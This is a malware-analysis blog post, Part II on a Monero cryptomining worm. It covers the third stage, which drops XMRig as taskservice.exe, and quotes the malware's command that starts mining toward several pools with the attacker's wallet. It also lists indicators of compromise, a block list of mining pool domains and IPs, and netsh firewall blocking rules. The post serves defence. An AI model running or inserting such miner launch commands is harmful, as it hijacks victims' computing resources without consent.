Follow by Email

Thursday, December 21, 2017

Part II on Monero Miner



 

Introducing the Third Stage
 The info.vbs drops and executes from itself a compiled version of XMRIG renamed with the "mimetic" string: taskservice.exe.  Once the compiled PE file (XMRig) is placed in memory the new stage starts it by running the following commands.
 


Third Stage Execution of Monero Miner 


The clear text Monero address is visible on the code. Unfortunately the Monero address is not trackable so far. 
  
Monero address: 46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27dEL9RN3H2vLc6eG2wGahxpBK5zmCuE


and the used server is: stratum+tcp://pool.supportxmr.com:80
w.run "%temp%\taskservice.exe  -B -o stratum+tcp://pool.supportxmr.com:80 -u  46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27dEL9RN3H2vLc6eG2wGahxpBK5zmCuE  -o stratum+tcp://mine.xmrpool.net:80  -u  46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27dEL9RN3H2vLc6eG2wGahxpBK5zmCuE -o stratum+tcp://pool.minemonero.pro:80   -u  46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27dEL9RN3H2vLc6eG2wGahxpBK5zmCuE -p x" ,0
Many interesting other sections should be analyzed but for now lets stop here.
IOC.
Please find some of the most interesting IoC for you convenience.

- URL: http://118.184.48.95:8000/
- Monero Address: 46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27dEL9RN3H2vLc6eG2wGahxpBK5zmCuE
- Sha256: 19e15a4288e109405f0181d921d3645e4622c87c4050004357355b7a9bf862cc
- Sha256: 038d4ef30a0bfebe3bfd48a5b6fed1b47d1e9b2ed737e8ca0447d6b1848ce309

Conclusion.
We are facing one of the first complex delivery of cryptocoin mining Malware. Everybody knows about CryptoMine, BitCoinMiner and Adylkuzz Malware which basically dropped on the target machine a BitCoin Miner, so if you are wondering: Why Marco do you write: "one of the first Malware" ? Well actually I wrote one of the "first complex" delivery. Usual coins Malware are delivered with no propagation modules, with no exploiting module and with not file-less techniques. In fact, the way this Monero CPU Miner has been delivered, includes advanced methodologies of memory inflation, where the unpacked Malware is not saved on Hard Drive (a technique to bypass some Anti Virus) but it is inflated directly on memory and called directly from memory itself. 

We can consider this Malware as a last generation of -all in memory- CryptoWorm. 

Another interesting observation, at least on my personal point of view, comes from the first stage. Why the attacker included this useless stage ? It appears to be not useful at all, it's a mere dropper wth no controls nor evasions. The attacker could have delivered just the second stage within the first stage in it, assuring a more stealth network fingerprint. So why the attacker decided to deliver the CryptoWorm through the first stage ? Maybe the first stage is part of a bigger framework ? Are we facing a new generation of Malware Generator Kits ? 

 

List of Ip/domain to be blocked

Pool name
Ip Block List
bohemianpool.com
80.188.53.27
dwarfpool.com
104.25.51.105
fasthash.net
198.255.38.242
iwanttoearn.money
212.175.35.221
minemonero.gq
163.172.174.140
minercircle.com
163.172.80.114
minexmr.com
104.25.209.15
minexmr.org
52.8.187.102
mixpools.org
149.202.175.112
monero.crypto-pool.fr
212.83.158.14
monero.hashvault.pro
107.191.46.207
monero.lindon-pool.win
151.80.41.29
monero.miners.pro
194.247.13.160
monero.riefly.id
103.10.61.52
monero.us.to
174.138.53.64
monerohash.com
198.251.81.82
monerominer.life
138.197.199.239
moneroocean.stream
104.24.121.33
moneropool.com
104.27.159.16
moneropool.nl
139.162.158.112
moriaxmr.com
178.254.29.69
nanopool.org
104.27.111.34
pool.xmr.pt
94.46.164.183
pooldd.com
104.27.150.118
poolto.be
130.240.22.202
ratchetmining.com
136.144.137.125
supportxmr.com
88.99.138.74
teracycle.net
163.172.174.140
usxmrpool.com
167.88.115.253
viaxmr.com
104.24.106.79
xmr.alimabi.cn
61.160.224.169
xmr.mypool.online
78.47.63.190
xmr.prohash.net
138.201.206.47
xmr.suprnova.cc
145.239.65.23
xmrpool.eu
176.31.105.53
xmrpool.net
107.167.87.242
xmrpool.xyz
165.227.65.65
  


Run these commands and block the connections from firewall
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=94.23.41.130/32


netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=37.59.43.131/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=37.59.44.193/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=37.59.45.174/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=37.59.54.205/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=37.59.55.60/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=37.187.154.79/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=46.105.103.169/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=78.46.89.102/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=78.46.91.134/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=78.46.91.171/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=91.121.87.10/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=94.23.41.130/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=94.23.206.130/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=94.23.212.204/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=94.130.164.60/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=176.31.117.82/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=178.63.48.196/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=188.165.199.78/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=188.165.214.76/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=188.165.254.85/32


netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=80.188.53.27/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=104.25.51.105/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=198.255.38.242/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=212.175.35.221/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=163.172.174.140/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=163.172.80.114/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=104.25.209.15/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=52.8.187.102/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=149.202.175.112/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=212.83.158.14/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=107.191.46.207/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=151.80.41.29/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=194.247.13.160/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=103.10.61.52/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=174.138.53.64/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=198.251.81.82/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=138.197.199.239/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=104.24.121.33/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=104.27.159.16/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=139.162.158.112/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=178.254.29.69/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=104.27.111.34/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=94.46.164.183/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=104.27.150.118/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=130.240.22.202/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=136.144.137.125/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=88.99.138.74/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=163.172.174.140/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=167.88.115.253/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=104.24.106.79/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=61.160.224.169/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=78.47.63.190/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=138.201.206.47/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=145.239.65.23/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=176.31.105.53/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=107.167.87.242/32
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=165.227.65.65/32
 

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.